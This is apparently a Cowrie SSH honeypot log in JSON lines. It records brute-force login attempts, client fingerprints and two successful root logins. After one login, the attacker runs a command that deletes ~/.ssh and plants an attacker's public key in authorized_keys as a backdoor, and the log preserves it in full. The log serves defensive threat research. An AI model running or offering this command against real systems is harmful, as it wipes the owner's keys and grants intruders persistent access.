n-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:49.799748Z","src_ip":"212.227.235.229","session":"0d455e592367"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:50.826264Z","src_ip":"212.227.235.229","session":"d91dff40392a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:50.827262Z","src_ip":"212.227.235.229","session":"d91dff40392a"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:50.830612Z","src_ip":"212.227.235.229","session":"d91dff40392a"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"!","message":"login attempt [esuser/!] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:51.125982Z","src_ip":"212.227.235.229","session":"0d455e592367"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:52.448993Z","src_ip":"212.227.235.229","session":"0d455e592367"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46060,"dst_ip":"1.2.3.4","dst_port":22,"session":"64975bb7f357","protocol":"ssh","message":"New connection: 212.227.235.229:46060 (1.2.3.4:22) [session: 64975bb7f357]","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.173826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.174810Z","src_ip":"212.227.235.229","session":"64975bb7f357"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.201989Z","src_ip":"212.227.235.229","session":"9e3febe80bcd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.202562Z","src_ip":"212.227.235.229","session":"9e3febe80bcd"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.205165Z","src_ip":"212.227.235.229","session":"9e3febe80bcd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:56.507556Z","src_ip":"212.227.235.229","session":"64975bb7f357"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"Password1","message":"login attempt [dspace/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:57.870198Z","src_ip":"212.227.235.229","session":"64975bb7f357"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:59.202918Z","src_ip":"212.227.235.229","session":"64975bb7f357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50844,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9a3033169c","protocol":"ssh","message":"New connection: 212.227.125.160:50844 (1.2.3.4:22) [session: 7c9a3033169c]","sensor":"my-vps","timestamp":"2025-09-08T22:04:02.832055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:04:02.832788Z","src_ip":"212.227.125.160","session":"7c9a3033169c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:04:02.892464Z","src_ip":"212.227.125.160","session":"7c9a3033169c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:03.213463Z","src_ip":"212.227.125.160","session":"7c9a3033169c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36742,"dst_ip":"1.2.3.4","dst_port":22,"session":"abf3106ab6e8","protocol":"ssh","message":"New connection: 212.227.235.229:36742 (1.2.3.4:22) [session: abf3106ab6e8]","sensor":"my-vps","timestamp":"2025-09-08T22:04:17.166020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:17.167117Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:17.349756Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.login.success","username":"root","password":"a@12","message":"login attempt [root/a@12] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:04:18.121482Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:04:18.511205Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:04:18.511976Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:04:18.512898Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:18.696955Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:04:19.177989Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.178810Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.363913Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.364882Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36748,"dst_ip":"1.2.3.4","dst_port":22,"session":"230d9076de2f","protocol":"ssh","message":"New connection: 212.227.235.229:36748 (1.2.3.4:22) [session: 230d9076de2f]","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.518620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.519695Z","src_ip":"212.227.235.229","session":"230d9076de2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:19.687377Z","src_ip":"212.227.235.229","session":"230d9076de2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:04:20.401158Z","src_ip":"212.227.235.229","session":"230d9076de2f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:21.570576Z","src_ip":"212.227.235.229","session":"230d9076de2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36756,"dst_ip":"1.2.3.4","dst_port":22,"session":"e05f8a5b5b62","protocol":"ssh","message":"New connection: 212.227.235.229:36756 (1.2.3.4:22) [session: e05f8a5b5b62]","sensor":"my-vps","timestamp":"2025-09-08T22:04:21.763394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:21.764615Z","src_ip":"212.227.235.229","session":"e05f8a5b5b62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:21.946193Z","src_ip":"212.227.235.229","session":"e05f8a5b5b62"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:04:22.712631Z","src_ip":"212.227.235.229","session":"e05f8a5b5b62"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:22.896227Z","src_ip":"212.227.235.229","session":"abf3106ab6e8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:22.897089Z","src_ip":"212.227.235.229","session":"e05f8a5b5b62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36787,"dst_ip":"1.2.3.4","dst_port":23,"session":"79726ec7d218","protocol":"telnet","message":"New connection: 212.227.125.160:36787 (1.2.3.4:23) [session: 79726ec7d218]","sensor":"my-vps","timestamp":"2025-09-08T22:04:29.177066Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43068,"dst_ip":"1.2.3.4","dst_port":22,"session":"a653eb0d998f","protocol":"ssh","message":"New connection: 212.227.235.229:43068 (1.2.3.4:22) [session: a653eb0d998f]","sensor":"my-vps","timestamp":"2025-09-08T22:04:35.075757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:35.076645Z","src_ip":"212.227.235.229","session":"a653eb0d998f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:35.369018Z","src_ip":"212.227.235.229","session":"a653eb0d998f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58162,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70be60bdaf1","protocol":"ssh","message":"New connection: 212.227.235.229:58162 (1.2.3.4:22) [session: f70be60bdaf1]","sensor":"my-vps","timestamp":"2025-09-08T22:04:35.900436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:35.902200Z","src_ip":"212.227.235.229","session":"f70be60bdaf1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:36.213474Z","src_ip":"212.227.235.229","session":"f70be60bdaf1"}
{"eventid":"cowrie.login.failed","username":"proxyuser","password":"12345","message":"login attempt [proxyuser/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:04:36.581068Z","src_ip":"212.227.235.229","session":"a653eb0d998f"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"changeme","message":"login attempt [muhamad/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:04:37.498629Z","src_ip":"212.227.235.229","session":"f70be60bdaf1"}
